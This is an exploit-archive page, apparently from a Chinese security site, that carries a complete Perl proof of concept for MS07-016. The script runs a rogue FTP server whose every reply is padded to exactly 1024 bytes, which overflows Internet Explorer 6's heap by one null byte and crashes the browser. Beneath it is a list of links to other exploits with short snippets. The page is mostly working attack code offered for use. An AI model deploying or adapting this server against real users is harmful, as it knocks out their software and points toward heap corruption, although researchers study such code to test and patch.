MS Internet Explorer (FTP Server Response) DoS Exploit

所属分类: 网络安全 / Exploit 阅读数: 117
收藏 0 赞 0 分享
#!/usr/bin/perl

# MS 07-016 FTP Server Response PoC
# Usage: ./ms07016ftp.pl [LISTEN_IP]
#
# Tested Against: MSIE 6.02900.2180 (SP2)
#
# Details: The response is broken into buffers, either at length 1024,
# or at '\r\n'. Each buffer is apended with \x00, without
# bounds checking. If the response is exctly 1024 characters
# in length, you will overflow the heap with the string \x00.


use IO::Socket;
use strict;

# Create listener
my $ip=shift || '127.0.0.1';
my $sock = IO::Socket::INET->new(Listen=>1,
LocalHost=>$ip,
LocalPort=>'21',
Proto=>'tcp');
$sock or die ("Could not create listener.\nMake sure no FTP server is running, and you are running this as root.\n");

# Wait for initial connection and send banner
my $sock_in = $sock->accept();
print $sock_in "220 waa waa wee waa\r\n";

# Send response code with total lenght of response = 1024
while (<$sock_in>){
my $response;
if($_ eq "USER") { $response="331 ";}
elsif($_ eq "PASS") { $response="230 ";}
elsif($_ eq "syst") { $response="215 ";}
elsif($_ eq "CWD") { $response="250 ";}
elsif($_ eq "PWD") { $response="230 ";}
else { $response="200 ";}
print $sock_in $response."A"x(1024-length($response)-2)."\r\n";
}
close($sock);
//http://www.heibai.net
更多精彩内容其他人还在看

Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability

<< In The Name Of GOD >> -------------------------------------------------------------
收藏 0 赞 0 分享

Galatolo Web Manager 1.3a

--== ============================================================================ ==-- --== Galatolo Web Manager 1.3a <= XSS / Remo
收藏 0 赞 0 分享

pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

==================================================== | pSys v0.7.0 Alpha Multiple Remote File Include | (works only with
收藏 0 赞 0 分享

Bilboblog 2.1 Multiple Remote Vulnerabilities

------------------------------------------------------------------ Name : Bilboblog 2.1 Multiples Vulnerabilities Descrip
收藏 0 赞 0 分享

Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)

########################## www.BugReport.ir ######################### # # AmnPardaz Security Research Team # # Title: Pluck
收藏 0 赞 0 分享

Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit

<?php /* Coded By RMx - Liz0zim BiyoSecurity.Com & Coderx.org Ki zava Ki Zava :) Thanx : Crackers_Child - TR_IP - Volq
收藏 0 赞 0 分享

CodeDB (list.php lang) Local File Inclusion Vulnerability

############################################################################### # # Name : CodeDB (list.php lang) Local File In
收藏 0 赞 0 分享

MFORUM 0.1a Arbitrary Add-Admin Vulnerability

================================================= MFORUM 0.1a Arbitrary Add-Admin Vulnerability ====================================
收藏 0 赞 0 分享

ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities

######## ## ## ###### ######## ## ## ######## ######## ####### ######## ## ### ## ## ## ## ## ## ## ##
收藏 0 赞 0 分享

MS Windows (.doc File) Malformed Pointers Denial of Service Exploit

/***************************************************************************** * Microsoft Windows .doc File Malformed Pointer
收藏 0 赞 0 分享
查看更多